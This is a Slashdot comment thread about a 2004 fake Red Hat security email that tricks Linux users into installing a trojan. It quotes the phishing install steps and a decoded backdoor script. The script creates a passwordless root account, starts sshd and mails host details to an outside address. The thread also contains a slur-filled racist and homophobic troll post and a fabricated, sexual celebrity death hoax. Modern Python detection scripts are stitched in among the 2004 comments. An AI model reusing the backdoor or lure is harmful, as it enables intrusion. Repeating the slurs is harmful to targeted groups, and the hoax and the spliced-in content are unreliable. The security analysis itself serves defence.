Slashdot: News for Nerds

Beware 'Fedora-Redhat' Fake Security Alert

timothy posted more than 9 years ago | from the don't-get-took dept.

Security 628

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.


628 comments

What's the problem? (-1, Troll)

Anonymous Coward | more than 9 years ago | (#10617031)

Linux initself is malicious code.

GNAA declares victory over Wikipedia (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#10617032)

GNAA declares victory over Wikipedia
Zeikfried - Associated Press, Nigeria

In a week which shall be recorded in Wikipedia infamy (and then vandalized and redirected to clitoris), the oft persecuted and never defeated internet missionaries of the Gay Nigger Association of America [www.gnaa.us] struck yet another powerful and telling blow against the powerful forces of bigotry and racism. Most notably, the growing zionist community on renowned internet pissing yard wikipedia.org [wikipedia.org] .

And the records have indeed tumbled, with an unheard of third successful survival from the digital shitheap that is "Votes For Deletion" [wikipedia.org] . Coming in spite a heinous act of self promotion and cyber terrorism by Pat Gunn/Improv [dachte.org] (formerly known as Aharon Meshenstein prior to his infiltration of the United States), who listed and inspired mob vandalism upon the GNAA's entry [wikipedia.org] .

Fresh from his promotion of Wikipedia's $50,000 fundraiser for arms and supplies to the Jewish state of Israel, Improv launched a series of unprovoked and slanderous attacks against the well loved organisations leadership, all the while using foul and unholy necromancies to enlist the dead themselves to vote the entries deletion. Names such as "Wolfman" and "Demonslave" only adding to the damning list of evidence linking Mr Gunn to the occult.

Though Improv's actions gained him a small majority, a shock last minute intervention from Pope John Paul II spared the pages untimely fate, although as yet unconfirmed reports have indicated that several hundred 8-year old negro children were driven to the Basilica to secure the pontiffs support. Others point towards the black curse cast upon the deletion campaign by the support of infamous Brawl Hall mouthpiece "Yoyo [brawl-hall.com] " as the main driving force behind the salvation of the aforementioned entry.

But the details are likely to cause few sleepless nights among the group, only one of whom was willing to speak to the press. Namely GNAA Wikipedia contributor Popeye, who interrupted his drawing of pornography to give a brief dismissal of the controversy: "Even with Improv's shady dealings, the sheer size and girth of a swollen GNAA phallus enables it both an identity and a vote of its own. Making such discussion moot".

About Wikipedia:

Wikipedia, a content-free encyclopedia in many languages, started life in January 2001 and has already risen to the status of the internets premiere "trollpedia".

Currently Wikipedia contains 363950 articles, 10032 of which are genuine, and 343 of them factually accurate. Leaving Wikipedia on an academic par with "Star Wars: Incredible Cross-sections: The Ultimate Guide to Star Wars Vehicles and Spacecraft" [amazon.com] and "My First Book of Animals from A to Z" [amazon.com] .


About GNAA:

GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the first organization which gathers GAY NIGGERS from all over America and abroad for one common goal - being GAY NIGGERS.

Are you GAY [klerck.org] ?
Are you a NIGGER [mugshots.org] ?
Are you a GAY NIGGER [gay-sex-access.com] ?

If you answered "Yes" to all of the above questions, then GNAA (GAY NIGGER ASSOCIATION OF AMERICA) might be exactly what you've been looking for!
Join GNAA (GAY NIGGER ASSOCIATION OF AMERICA) today, and enjoy all the benefits of being a full-time GNAA member.
GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the fastest-growing GAY NIGGER community with THOUSANDS of members all over United States of America and the World! You, too, can be a part of GNAA if you join today!

Why not? It's quick and easy - only 3 simple steps!
  • First, you have to obtain a copy of GAYNIGGERS FROM OUTER SPACE THE MOVIE [imdb.com] and watch it. You can download the movie [idge.net] (~130mb) using BitTorrent.
  • Second, you need to succeed in posting a GNAA First Post [wikipedia.org] on slashdot.org [slashdot.org] , a popular "news for trolls" website.
  • Third, you need to join the official GNAA irc channel #GNAA on irc.gnaa.us, and apply for membership.
Talk to one of the ops or any of the other members in the channel to sign up today! Upon submitting your application, you will be required to submit links to your successful First Post, and you will be tested on your knowledge of GAYNIGGERS FROM OUTER SPACE.

If you are having trouble locating #GNAA, the official GAY NIGGER ASSOCIATION OF AMERICA irc channel, you might be on a wrong irc network. The correct network is NiggerNET, and you can connect to irc.gnaa.us as our official server. Follow this link [irc] if you are using an irc client such as mIRC.

If you have mod points and would like to support GNAA, please moderate this post up.

.________________________________________________.
| ______________________________________._a,____ | Press contact:
| _______a_._______a_______aj#0s_____aWY!400.___ | Gary Niger
| __ad#7!!*P____a.d#0a____#!-_#0i___.#!__W#0#___ | gary_niger@gnaa.us [mailto]
| _j#'_.00#,___4#dP_"#,__j#,__0#Wi___*00P!_"#L,_ | GNAA Corporate Headquarters
| _"#ga#9!01___"#01__40,_"4Lj#!_4#g_________"01_ | 143 Rolloffle Avenue
| ________"#,___*@`__-N#____`___-!^_____________ | Tarzana, California 91356
| _________#1__________?________________________ |
| _________j1___________________________________ | All other inquiries:
| ____a,___jk_GAY_NIGGER_ASSOCIATION_OF_AMERICA_ | Enid Indian
| ____!4yaa#l___________________________________ | enid_indian@gnaa.us [mailto]
| ______-"!^____________________________________ | GNAA World Headquarters
` _______________________________________________' 160-0023 Japan Tokyo-to Shinjuku-ku Nishi-Shinjuku 3-20-2

Copyright (c) 2003-2004 Gay Nigger Association of America [www.gnaa.us]

Sad news, Britney Spears dead at 22 (-1, Offtopic)

Troll-a-holic (823973) | more than 9 years ago | (#10617137)

Sad news, Britney Spears dead at 22

I just heard some really sad news on Fox - Singer and Popstar Britney Jean Spears was found dead in her Louisiana home this morning.

Apparently, the cause of death was excessive bleeding after a sizzling night of hot anal sex with her ex. boyfriend, Justin Timberlake.

"We were just having good sushi, and she asked me if I would please her", said Justin. Although he has since turned gay after his breakup with her, Justin was willing to please Britney as long as she would take it up her ass.

Following a night of sex for 10 hours, Britney sustained an injury in her lower vaginal area and subsequently bled to death. Her husband Kevin Federline, who is at the moment spending time at a federal prison for sexual advances towards Natalie "hot grits" Portman was not available for comment.

However, President George W Bush offered his comments on the incident. "Here is the reason why anal sex is bad and why gays are unAmerican, they kill Americans and American icons", he was quoted as saying.

There weren't any more details. I'm sure everyone in the Slashdot community will surely miss her - even if you didn't enjoy her work, there's no denying her contributions to popular culture. Truly an American icon.

*sob*

Hit me baby, one more time. I'll miss you, oh baby baby.

Indeed, Britney. Indeed. Rest in peace, child.

DA TROLL-A-HOLIC IS BACKKKKKKKKKKKKKKKK

MUHAHAHAHAHHAAAAAAAAAAAAAAAAAAAAA!!!!!!!!!

fp (-1, Offtopic)

Anonymous Coward | more than 9 years ago | (#10617035)

fp

damn ms employee (-1, Troll)

Anonymous Coward | more than 9 years ago | (#10617037)

nice try!

Hmmmmm (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#10617039)


text of site (5, Informative)

Anonymous Coward | more than 9 years ago | (#10617041)

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

Re:text of site (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#10617086)

It is known that *BSD and Solaris platforms are NOT affected.

With OpenBSD's narrow and forever changing definition of what constitutes an exploit, it would surprise me if a hacker root-kitting an OpenBSD server and reformatting its hard drive wouldn't count, oh but that would be a crash or some other excuse made by that smelly Ratt.

Re:text of site (0)

Botty (715495) | more than 9 years ago | (#10617117)

rofl....remote exploit in ls? Sure.....cause ls binds to port 1337 on execution...oh ya and I setuid ls. The thing about microsoft products is that because they keep everything so hush hush they COULD have remote exploits in the tiniest of products and programs. You never can be sure of what they're doing, but since Linux allows and encourages a complete understanding of how things work, this scare tactic is just laughable. The BSD and Solaris platform notice just means the hacker couldn't make his code portable ;)

Re: text (5, Insightful)

Inf0phreak (627499) | more than 9 years ago | (#10617145)

Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).

Re:text of site (0)

Anonymous Coward | more than 9 years ago | (#10617154)

So, #1 it doesn't use RPM? Let's see what else could we see wrong with this?

Re:text of site (5, Informative)

Seehund (86897) | more than 9 years ago | (#10617203)

Actually, the exploit indeed seems to use RPM. The archive includes a .bin file, which in reality is an RPM.
drwxr-xr-x root/wheel 0 2004-10-23 21:09:09 fileutils-1.0.6.patch/
-rw-r--r-- root/wheel 32 2004-10-23 02:59:42 fileutils-1.0.6.patch/Makefile
-rw-r--r-- root/wheel 14297 2004-10-23 18:02:12 fileutils-1.0.6.patch/inst.c
-rw-r--r-- root/wheel 990084 2004-10-23 21:06:48 fileutils-1.0.6.patch/fileutils-patch.bin
But I see what you mean.

Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

I doubt that many fell for this.

DON'T DO THIS (-1)

Anonymous Coward | more than 9 years ago | (#10617168)

Jesus Tittyfucking Christ, put up a warning, will you? That's the text from the fake warning. By copy pasting it here you've probably gotten a few morons to install this malware afterall. Nice going.

Christ, they didn't do a very good job... (5, Insightful)

Nailer (69468) | more than 9 years ago | (#10617207)

The domain name was a good start, but these kids will have a hard time fooling anyone since they've ignored most of the basics:

  • Most users who install security upgrades won't be running Red Hat 7.x.
  • Red Hat is two words. Both begin with capitals.
  • Red Hat use packages. Not hard guys.
  • Security updates are provided through up2date. If they were smart, they would have provided an up2date source to use.
  • The exclamation marks in 'Apply this patch!' seem a little un-vendor-like
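The domain is the one "basic" in that list that a mail filter can check mechanically: a hostname that contains a vendor's brand words but is not under the vendor's real domain. The following script is an added example, not code from the thread or from Red Hat; it pulls the hostnames out of the fake alert quoted above and classifies each one. The list of legitimate domains and the brand tokens are assumptions made for the example.

```python
"""Added example: flag look-alike vendor domains in an advisory e-mail."""
import re

# Excerpt of the fake alert quoted earlier in the thread (constructed copy).
FAKE_ALERT = """\
First download the patch from the Stanford RedHat mirror:
wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
"""

# Assumption for the example: the only domain the vendor sends advisories from.
# Subdomains such as fedora.redhat.com are accepted; fedora-redhat.com is not.
LEGIT_DOMAINS = {"redhat.com"}

# Assumption for the example: brand words whose presence in a foreign hostname
# marks it as an impersonation attempt rather than an unrelated site.
BRAND_TOKENS = ("redhat", "fedora")

# A bare or prefixed hostname: dotted labels ending in an alphabetic TLD.
# The look-behind stops the regex from starting inside a URL path
# (e.g. "fileutils-1.0.6.patch.tar.gz"), the look-ahead stops it ending
# in the middle of a label.
HOST_RE = re.compile(
    r"(?<![\w./-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?![\w.-])", re.IGNORECASE
)


def extract_hosts(text):
    """Return the distinct hostnames in `text`, lower-cased, in order of appearance."""
    seen = []
    for host in HOST_RE.findall(text):
        host = host.lower()
        if host not in seen:
            seen.append(host)
    return seen


def classify_host(host, legit_domains=LEGIT_DOMAINS, brand_tokens=BRAND_TOKENS):
    """'legitimate' if under a real vendor domain, 'lookalike' if it merely
    contains a brand token, otherwise 'unrelated'."""
    host = host.lower().rstrip(".")
    for domain in legit_domains:
        if host == domain or host.endswith("." + domain):
            return "legitimate"
    if any(token in host for token in brand_tokens):
        return "lookalike"
    return "unrelated"


def review_advisory(text):
    """Map every hostname mentioned in the e-mail to its classification."""
    return {host: classify_host(host) for host in extract_hosts(text)}


if __name__ == "__main__":
    for host, verdict in review_advisory(FAKE_ALERT).items():
        print(f"{verdict:10s} {host}")
```

The check is deliberately strict about suffix matching: `endswith("." + domain)` is what separates `fedora.redhat.com` (a real subdomain) from `fedora-redhat.com` (a separately registered domain that only resembles one).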

Re:text of site (0)

Anonymous Coward | more than 9 years ago | (#10617239)

66.218.79.155, 66.218.79.147, 66.218.79.148, ...
Connecting to www.fedora-redhat.com[66.218.79.155]:80... connected.

# as of this post it is still up...

We knew this day would come (4, Insightful)

Orgazmus (761208) | more than 9 years ago | (#10617044)

Adopting dumb users had to bring the ones exploiting the stupidity with them. Even though running as a non-admin should help against these things, there is no cure against security holes between the chair and the keyboard.

Re:We knew this day would come (0, Flamebait)

Solean (705818) | more than 9 years ago | (#10617049)

Linux users are proven to be smarter than the Windows breed of the human race. :)

Re:We knew this day would come (5, Funny)

Stevyn (691306) | more than 9 years ago | (#10617054)

I wouldn't worry, they're probably on the forums trying to find the command to install it.

About Time (4, Insightful)

Mr. Arbusto (300950) | more than 9 years ago | (#10617045)

It's phishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.

I'll try it... (5, Interesting)

enginuitor (779522) | more than 9 years ago | (#10617048)

I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.

Stay tuned.

Re:I'll try it... (2, Interesting)

busonerd (534486) | more than 9 years ago | (#10617089)

Same here. Let's use this thread for a discussion of wtf it does.

Re:I'll try it... (4, Informative)

busonerd (534486) | more than 9 years ago | (#10617109)

[apologies for replying to myself]

The makefile compiles an application called inst that seems to have been created with the shc script compiler. It's rather obfuscated. Attempting to reverse engineer now.

Re:I'll try it... (3, Informative)

Cid Highwind (9258) | more than 9 years ago | (#10617213)

From a quick glance at the source, it looks like "inst" is an RC4 decryption program with a hard-coded (but obfuscated) key. It will probably decrypt fileutils-patch.bin into the real exploit code.

Re:I'll try it... (5, Informative)

damiam (409504) | more than 9 years ago | (#10617096)

Make sure you use a chroot jail; Knoppix can still write to your hard drive.

Re:I'll try it... (1)

enginuitor (779522) | more than 9 years ago | (#10617108)

I'm removing all local disks from the system. Just CD. Stay tuned for updates...

Re: I'll try it... Execution results! (5, Informative)

enginuitor (779522) | more than 9 years ago | (#10617157)

Identifying the system. This may take up to 2 minutes. Please wait...
adduser: No more than two names.
passwd: Unknown user bash
Could not load host key: /etc/ssh/ssh_host_key
Could not load host key: /etc/ssh/ssh_host_rsa_key
Could not load host key: /etc/ssh/ssh_host_dsa_key
Disabling protocol version 1. Could not load host key.
Disabling protocol version 2. Could not load host key.
sshd: no hostkeys available -- exiting.
System looks OK. Proceeding to next step.

Patching "ls": ###########
Patching "mkdir": ##########

System updated and secured successfully. You may erase these files.

Re: I'll try it... Execution results! (1)

Peridriga (308995) | more than 9 years ago | (#10617169)

Well... That's all well and good... How about actually posting the source and what it does instead of the output...

Re: I'll try it... Execution results! (0)

Anonymous Coward | more than 9 years ago | (#10617201)

here you go [fedora-redhat.com]

Contents of inst.c... (5, Informative)

enginuitor (779522) | more than 9 years ago | (#10617229)

I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
View inst.c [gee-enginuity.com]

Re: I'll try it... Execution results! (5, Informative)

enginuitor (779522) | more than 9 years ago | (#10617190)

It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.

Re:I'll try it... (4, Informative)

eakerin (633954) | more than 9 years ago | (#10617172)

Well I downloaded it, and uncompressed it.

There are 3 files:
fileutils-patch.bin
inst.c
Makefile

fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from Red Hat (verified the GPG signature). Probably just put there to make it look bigger, and have something that came from Red Hat.

Well I was gonna put the package header information here, but slashcode didn't like it.

Signature verification using "rpm --checksig fileutils-patch.bin"
fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK

Re:I'll try it... (5, Informative)

superpeach (110218) | more than 9 years ago | (#10617204)

I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.html )

The working bit of the script is:

echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
rm -rf /tmp/mama

So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.
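The two lines that matter in that script are `adduser -g 0 -u 0 -o bash` (a second account with uid 0) and `passwd -d bash` (no password on it), and both leave a mark in /etc/passwd and /etc/shadow that a host check can find. The script below is an added example written for this thread, not code from the post or from any distribution; the passwd and shadow lines it scans are constructed to look like a system on which the backdoor succeeded.

```python
"""Added example: find the account the fake 'fileutils patch' would create."""

# Constructed sample /etc/passwd: a normal box plus the "bash" account that
# `adduser -g 0 -u 0 -o bash` creates (uid 0, gid 0, shares root's privileges).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
"""

# Constructed sample /etc/shadow: `passwd -d bash` empties the password field,
# so the account can log in over the sshd the script starts without a password.
SAMPLE_SHADOW = """\
root:$1$saltsalt$hashhashhashhashhashha:12700:0:99999:7:::
alice:$1$saltsalt$anotherhashanotherhash:12700:0:99999:7:::
bash::12715:0:99999:7:::
"""


def parse_colon_file(text):
    """Yield the fields of every non-empty, non-comment line of a colon-separated file."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        yield line.split(":")


def find_uid0_accounts(passwd_text):
    """Usernames other than root whose uid is 0: every one of them is a second root."""
    hits = []
    for fields in parse_colon_file(passwd_text):
        if len(fields) < 7:
            continue  # not a well-formed passwd entry
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            hits.append(name)
    return hits


def find_passwordless_accounts(shadow_text):
    """Accounts whose shadow password field is empty, i.e. no password is required."""
    hits = []
    for fields in parse_colon_file(shadow_text):
        if len(fields) < 2:
            continue
        name, password = fields[0], fields[1]
        if password == "":
            hits.append(name)
    return hits


def audit(passwd_text, shadow_text):
    """Combine both checks; an extra uid-0 account with no password is the worst case."""
    uid0 = find_uid0_accounts(passwd_text)
    no_password = set(find_passwordless_accounts(shadow_text))
    findings = []
    for name in uid0:
        findings.append((name, "critical" if name in no_password else "high"))
    for name in sorted(no_password):
        if name not in uid0:
            findings.append((name, "medium"))
    return findings


if __name__ == "__main__":
    # On a real host you would read /etc/passwd and /etc/shadow (as root) instead.
    for name, severity in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{severity}: account {name!r}")
```

The check keys on the uid, not on the name, because nothing in the technique depends on the account being called "bash"; the uid-0 test catches the same backdoor under any name.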

wont work (3, Insightful)

Anonymous Coward | more than 9 years ago | (#10617052)

Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.

Re:wont work (1)

bcs_metacon.ca (656767) | more than 9 years ago | (#10617224)

Here's hoping *none* would. Fedora Core gives you the option of using up2date or yum right out of the box, and some people use apt. All three do GPG signature checking by default.

I hope anyone stupid enough to fall for this obvious scam would also be too dumb to know how to compile and install the software anyway.

This was a pretty lame attempt. If someone *really* wanted to cause havoc, they'd hack one of the central repositories and insert poison packages into a trusted source. Of course, that's orders of magnitude more difficult. I mean, that hasn't even happened to Windows Update yet! :-)

I wonder... (1, Troll)

bennomatic (691188) | more than 9 years ago | (#10617053)

...was this set up by SCO, Microsoft or one of the anti-virus folks who want to prove that Linux isn't without its weaknesses...?

Re:I wonder... (0)

Anonymous Coward | more than 9 years ago | (#10617097)

/me straps on his Foil Hat.

MAYYYYBE!

Re:I wonder... (0)

Anonymous Coward | more than 9 years ago | (#10617110)

You must be TRYING to get the tin-foil hat award.

Re:I wonder... (4, Funny)

Forezt (769932) | more than 9 years ago | (#10617129)

or better yet, if Microsoft paid the Yankee group to do it for them, and then do an "independent study" on it.

Re:I wonder... (0)

Anonymous Coward | more than 9 years ago | (#10617191)

wouldn't be surprised if they were...

Here's what WHOIS says: (5, Informative)

SIGBUS (8236) | more than 9 years ago | (#10617056)

[Querying whois.internic.net]
[Redirected to whois.melbourneit.com]
[Querying whois.melbourneit.com]
[whois.melbourneit.com]

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
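Two things in that record can be checked without trusting the registrant details at all: the domain was created on 2004-10-24, four days after the "Original issue date" the fake alert claims, and the ZIP code does not belong to the state given. The script below is an added example, not code from the thread; it parses the dotted-label WHOIS format quoted above and reports those inconsistencies. The ZIP-prefix table is a partial one constructed for the example (95301 is Atwater, CA, as a reply notes).

```python
"""Added example: sanity-check a WHOIS record against the advisory it serves."""
from datetime import date
import re

# The record as quoted in the thread (registrar contact block omitted).
WHOIS_TEXT = """\
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
"""

# Dates from the fake alert ("Original issue date: October 20, 2004") and the
# day the e-mail was being discussed.
ADVISORY_ISSUE_DATE = date(2004, 10, 20)
SEEN_ON = date(2004, 10, 25)

# "Label.... value": the label is everything before the run of dots.
LABEL_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?)\.+\s*(.*)$")

# Partial ZIP-prefix table constructed for the example: 953xx is central California.
ZIP_PREFIX_STATE = {"953": "CA"}


def parse_whois(text):
    """Turn the dotted-label output into {label: [values]}; repeated labels accumulate,
    empty continuation lines (e.g. a blank address line) are dropped."""
    record = {}
    for line in text.splitlines():
        match = LABEL_RE.match(line.rstrip())
        if not match:
            continue
        label, value = match.group(1).strip(), match.group(2).strip()
        record.setdefault(label, [])
        if value:
            record[label].append(value)
    return record


def parse_iso_date(value):
    year, month, day = (int(part) for part in value.split("-"))
    return date(year, month, day)


def domain_age_days(record, as_of):
    """Days between the domain's creation date and `as_of`."""
    return (as_of - parse_iso_date(record["Creation Date"][0])).days


def zip_state_mismatch(address_lines):
    """(zip, stated_state, expected_state) if the ZIP prefix points to another state, else None."""
    zip_code = next((v for v in address_lines if re.fullmatch(r"\d{5}", v)), None)
    state = next((v for v in address_lines if re.fullmatch(r"[A-Z]{2}", v)), None)
    if zip_code is None or state is None:
        return None
    expected = ZIP_PREFIX_STATE.get(zip_code[:3])
    if expected is not None and expected != state:
        return (zip_code, state, expected)
    return None


def check_advisory_domain(record, advisory_date, seen_on, max_age_days=30):
    """List the reasons this domain is a suspicious source for the advisory."""
    reasons = []
    created = parse_iso_date(record["Creation Date"][0])
    if created > advisory_date:
        reasons.append(f"registered {created}, after the advisory's stated issue date {advisory_date}")
    age = (seen_on - created).days
    if age < max_age_days:
        reasons.append(f"only {age} day(s) old when the e-mail was seen")
    mismatch = zip_state_mismatch(record.get("Organisation Address", []))
    if mismatch:
        zip_code, state, expected = mismatch
        reasons.append(f"ZIP {zip_code} is in {expected}, but the record says {state}")
    return reasons


def example_findings():
    """Run the checks on the quoted record with the thread's dates."""
    return check_advisory_domain(parse_whois(WHOIS_TEXT), ADVISORY_ISSUE_DATE, SEEN_ON)


if __name__ == "__main__":
    for reason in example_findings():
        print("-", reason)
```

The creation-date test is the one worth keeping in a mail gateway: a vendor's advisory domain predates its advisories, so a domain younger than the alert it "announces" is wrong regardless of who the registrant claims to be.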

Re:Here's what WHOIS says: (2, Informative)

barzok (26681) | more than 9 years ago | (#10617119)

95301 is Atwater, CA. There are at least 2 Cedar Avenues in NY (Staten Island and The Bronx), and one in Atwater.

Re:Here's what WHOIS says: (3, Informative)

datastalker (775227) | more than 9 years ago | (#10617158)

That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false.

Re:Here's what WHOIS says: (2, Informative)

Shandon (53512) | more than 9 years ago | (#10617187)

Data looks contradictory, but also be wary of the joe-job. Raymond Jackson may be an unpopular name to have right about now...

Whois on domains are easily faked (2, Informative)

Theatetus (521747) | more than 9 years ago | (#10617212)

However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com [mailto]

Anybody feel like dropping them a line to tell them they're hosting trojaners?

Yahoo! (2, Informative)

pavo (70713) | more than 9 years ago | (#10617215)

Shut it down! Someone paid you to host this, pass that information along to the authorities.

Re:Here's what WHOIS says: (1)

Ann Coulter (614889) | more than 9 years ago | (#10617237)

Did anyone save an e-mail from this guy? If this whois is fake, maybe the e-mail can tell us more. Just a thought.

In case the site goes down.. (0)

Anonymous Coward | more than 9 years ago | (#10617057)


Real link? (5, Insightful)

chrispyman (710460) | more than 9 years ago | (#10617061)

Why not just use the real link and slashdot their site into oblivion!

Re:Real link? (1)

JamesTRexx (675890) | more than 9 years ago | (#10617103)

I see great slashdotters think alike. :-)

Re:Real link? (1)

2mcm (775747) | more than 9 years ago | (#10617133)

But some absent-minded sysadmin might forget what the article was about and think it was a real update.

Anyway, never trust any security updates that don't say what they do!!

Security only works when you know what to check (3, Insightful)

LostCluster (625375) | more than 9 years ago | (#10617063)

Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.

However, what good is that against Joe User who falls for the bait and thinks the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals", and so they don't see any red flags indicating that this is bogus.

It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absence of those marks is not as alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.

Nice spelling (0)

Anonymous Coward | more than 9 years ago | (#10617123)

Thoughtful post though!

Whois (1, Funny)

rsrsharma (769904) | more than 9 years ago | (#10617067)

Whois of fedora-redhat.com:

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

Looks like somebody's gonna get arrested. ;)

call the owner of the domain now. (-1, Redundant)

Anonymous Coward | more than 9 years ago | (#10617069)

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Finally... (1)

Seabass55 (472183) | more than 9 years ago | (#10617071)

Something that will weed out dumb linux users just like most all Windows viruses attack the dumb windows users.

Re:Finally... (1)

JamesTRexx (675890) | more than 9 years ago | (#10617128)

Maybe we should stop using virusscanners and do like nature, those that survive all the diseases will evolve into a better species (of users).

Re:Finally... (5, Funny)

Fapestniegd (34586) | more than 9 years ago | (#10617163)

Debian has been weeding out incompetent users with its "impossible to use" installer for years.

It keeps the "Mandrake Crew" off of the debian-users lists.

Stupid Tricks? (5, Interesting)

dj_cel (744926) | more than 9 years ago | (#10617073)

